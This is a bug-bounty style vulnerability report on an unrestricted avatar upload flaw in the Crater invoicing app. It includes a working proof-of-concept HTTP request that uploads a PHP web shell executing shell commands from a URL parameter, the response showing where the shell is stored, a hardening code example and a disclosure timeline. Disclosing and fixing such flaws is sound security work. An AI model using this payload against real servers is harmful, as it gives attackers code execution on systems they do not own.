Unrestricted Upload of File with Dangerous Type in crater-invoice/crater

Status: Valid

Reported on Dec 3rd 2021


Description

In the current Crater version (commit ed6268aa, tag 5.0.3), the lowest-privileged user can upload a PHP file instead of an avatar image.

Proof of Concept

POST /api/v1/me/upload-avatar HTTP/1.1
Host: 172.17.0.1:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
company: 1
X-XSRF-TOKEN: eyJpdiI6IlBrOE1JS01vcDBqL0hqcXZURTRQMmc9PSIsInZhbHVlIjoiMVVSUVk5N3FmYTh2UG5KSiszSmp3aEg5MXlxSWFMUHRNZFpyME5LRFM3OEpiRWR3dlVCeDJ4a2FYQU9hYmFrZjBmNVBUbGp5UitIY1c3L1JtcWtGaDdoalBXSXU3L2NFS2NMbHZVT3JhNm1zeXdLZllkR2RNVGdKL3NuSWhWblciLCJtYWMiOiI0OTRhMmZkZGFjODA1MWY3ZWQyZmRhY2RhNmRkOTVlNDc0Njg2YzlmY2E2NzkyZjU0ZWExNjBiZjVhZGViMGE2IiwidGFnIjoiIn0=
Content-Type: multipart/form-data; boundary=---------------------------324661512726686552372889486730
Content-Length: 270
Origin: http://172.17.0.1:8888
DNT: 1
Connection: close
Referer: http://172.17.0.1:8888/admin/settings/account-settings
Cookie: XSRF-TOKEN=eyJpdiI6IlBrOE1JS01vcDBqL0hqcXZURTRQMmc9PSIsInZhbHVlIjoiMVVSUVk5N3FmYTh2UG5KSiszSmp3aEg5MXlxSWFMUHRNZFpyME5LRFM3OEpiRWR3dlVCeDJ4a2FYQU9hYmFrZjBmNVBUbGp5UitIY1c3L1JtcWtGaDdoalBXSXU3L2NFS2NMbHZVT3JhNm1zeXdLZllkR2RNVGdKL3NuSWhWblciLCJtYWMiOiI0OTRhMmZkZGFjODA1MWY3ZWQyZmRhY2RhNmRkOTVlNDc0Njg2YzlmY2E2NzkyZjU0ZWExNjBiZjVhZGViMGE2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im13VlVJa1JyZWs4OWFLWlBBa0JobXc9PSIsInZhbHVlIjoiU21kVnR2Skc1UnZmSnR3SVhiL09qSFBmWGxGV0FMUi9pSzFSTkc2enBZL01GbkJBbCtiMzJmWnNLM3l2OWRJRVk0bUZ2dFRYTkVTWnRQV0xCNnkxbFdIOEJjS1E5N2dwRWNyNC90cHZRSTJaWHozcWNtcmo2RTltY2U0Q1ZEeXQiLCJtYWMiOiJmMzIxYTFiNjU2Y2QyOWM2ZDdiOWJiYzMyYjQ3NWFmZGM3NDU0ZTA0MjNhZjg0ZGEzZDgzZGFlMGEwMjQzMGJmIiwidGFnIjoiIn0%3D; D5zxaxhEVxptcHSFSkkLadY5LtUnr9yDLzGS8IGz=...%3D

-----------------------------324661512726686552372889486730
Content-Disposition: form-data; name="admin_avatar"; filename="shell.php"
Content-Type: image/svg+xml

<?php print_r(shell_exec($_GET[1])); ?>
-----------------------------324661512726686552372889486730--

In the response, the link to the uploaded file can be found in data->avatar:

{
    "data":
    {
        "id": 3,
        "name": "user2",
        "email": "user2-crater@zaqwsx.cc",
...
        "avatar": "http:\/\/172.17.0.1:8888\/storage\/4\/shell.php",
        "is_owner": false,
...
    }
}

Impact

This is a high-severity vulnerability that leads to code execution on the server.
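One way to harden the avatar endpoint, as an added example that is not Crater's code or its actual fix: validate the upload against the content-sniffed MIME type rather than the client-supplied Content-Type, and store it under a server-generated name. Only the field name admin_avatar comes from the report; the controller class, method, storage disk and user lookup are assumed.

```php
<?php
// Added example (not Crater's code): a hardened Laravel avatar upload handler.
// Assumed: class/method names, the "public" storage disk, and $request->user().

namespace App\Http\Controllers;

use Illuminate\Http\JsonResponse;
use Illuminate\Http\Request;
use Illuminate\Support\Facades\Storage;
use Illuminate\Support\Str;

class AvatarUploadController extends Controller
{
    // Extensions we are willing to serve back from /storage. Deliberately no "svg":
    // SVG is XML and may carry script; script-type extensions never appear here.
    private const ALLOWED = ['jpg', 'jpeg', 'png', 'gif', 'webp'];

    public function upload(Request $request): JsonResponse
    {
        // Laravel's "image" and "mimes" rules compare against the MIME type sniffed
        // from the file contents (finfo), so labelling a PHP payload as
        // "image/svg+xml" in the multipart part does not get it past validation.
        $request->validate([
            'admin_avatar' => ['required', 'file', 'image', 'mimes:jpg,jpeg,png,gif,webp', 'max:2048'],
        ]);

        $file = $request->file('admin_avatar');

        // extension() is also derived from the sniffed MIME type; the client-supplied
        // filename (e.g. "shell.php") is never used for anything.
        $ext = strtolower((string) $file->extension());
        if (!in_array($ext, self::ALLOWED, true)) {
            abort(422, 'Unsupported image type');
        }

        // Random server-generated basename: the uploader controls neither the name
        // nor the extension of the path that ends up under /storage.
        $name = Str::random(40) . '.' . $ext;
        $path = $file->storeAs('avatars/' . $request->user()->id, $name, 'public');

        return response()->json([
            'data' => ['avatar' => Storage::disk('public')->url($path)],
        ]);
    }
}
```

Independently of input validation, the storage directory the web server exposes should be configured so that nothing under it is ever executed as a script, which limits the damage if a validation bypass is found later.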

Occurrences

An unvalidated file can also be uploaded at the two further code locations referenced in this report (CompanyController.php#L64 and CompanyController.php#L95).

Timeline

We are processing your report and will contact the crater-invoice/crater team within 24 hours. (7 months ago)
theworstcomrade modified the report. (7 months ago)
We created a GitHub Issue asking the maintainers to create a SECURITY.md. (7 months ago)
We have contacted a member of the crater-invoice/crater team and are waiting to hear back. (7 months ago)
Mohit Panjwani validated this vulnerability. (7 months ago)
theworstcomrade has been awarded the disclosure bounty; the fix bounty is now up for grabs. (6 months ago)
Mohit Panjwani confirmed that a fix has been merged on cdc913. (6 months ago)
theworstcomrade has been awarded the fix bounty.
CompanyController.php#L95 has been validated.
CompanyController.php#L64 has been validated.